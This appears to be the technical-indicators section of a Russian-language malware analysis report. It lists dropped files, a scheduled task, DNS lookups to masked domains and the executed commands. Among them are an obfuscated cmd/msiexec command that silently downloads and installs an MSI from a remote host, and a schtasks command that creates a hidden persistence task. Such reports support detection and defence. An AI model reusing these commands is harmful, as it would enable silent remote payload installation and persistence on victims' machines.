Техническая информация
- <SYSTEM32>\tasks\updates\psjkkrwslzzuf
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i http://go###izm.com/wp-content/themes/busify/tpt/60237410.msi /qn
- msia340.tmp
- %APPDATA%\psjkkrwslzzuf.exe
- %TEMP%\tmpac84.tmp
- %TEMP%\270438e64c\log.txt
- %APPDATA%\psjkkrwslzzuf.exe
- %TEMP%\tmpac84.tmp
- http://go###izm.com/wp-content/themes/busify/tpt/60237410.msi
- http://ap#.#pify.org/
- DNS ASK go###izm.com
- DNS ASK ap#.#pify.org
- '%WINDIR%\installer\msia340.tmp'
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i http://go###izm.com/wp-content/themes/busify/tpt/60237410.msi /qn' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\PSJkKRwSLzZUf" /XML "%TEMP%\tmpAC84.tmp"' (со скрытым окном)
- '<SYSTEM32>\msiexec.exe' /i http://go###izm.com/wp-content/themes/busify/tpt/60237410.msi /qn
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\PSJkKRwSLzZUf" /XML "%TEMP%\tmpAC84.tmp"